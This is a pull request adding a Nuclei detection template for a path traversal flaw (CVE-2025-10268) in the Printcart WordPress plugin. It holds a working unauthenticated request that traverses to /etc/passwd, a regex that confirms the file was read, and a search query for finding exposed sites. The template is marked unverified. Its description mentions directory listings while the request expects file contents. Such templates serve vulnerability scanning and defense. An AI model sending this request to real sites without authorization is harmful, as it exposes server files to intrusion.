### PR TITLE
feat: add nuclei template for CVE-2025-10268

### DIFF
--- a/http/cves/2026/CVE-2025-10268.yaml
+++ b/http/cves/2026/CVE-2025-10268.yaml
@@ -1,0 +1,44 @@
+id: CVE-2025-10268
+
+info:
+  name: Printcart WordPress Plugin - Path Traversal
+  author: Hardik-369
+  severity: medium
+  description: |
+    The Printcart Web to Print Product Designer for WooCommerce WordPress plugin through 2.4.8 is vulnerable to path traversal which makes it possible for the attacker to retrieve the directory listing for arbitrary directories on the server.
+  impact: |
+    An unauthenticated attacker can retrieve directory listings of arbitrary directories on the server, potentially exposing sensitive file information.
+  remediation: |
+    Update the Printcart Web to Print Product Designer for WooCommerce plugin to the latest version.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-10268
+    - https://wp-safety.org/plugins/printcart-integration
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2025-10268
+    cwe-id: CWE-22
+  metadata:
+    max-request: 1
+    verified: false
+    vendor: printcart
+    product: printcart-integration
+    fofa-query: body="/wp-content/plugins/printcart-integration/"
+  tags: cve,cve2025,wordpress,wp-plugin,lfi,traversal,disclosure
+
+http:
+  - raw:
+      - |
+        GET /wp-json/nbdesigner/v1/get_images?directory=../../../../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
Adds Nuclei template for CVE-2025-10268 - Printcart Web to Print Product Designer for WooCommerce path traversal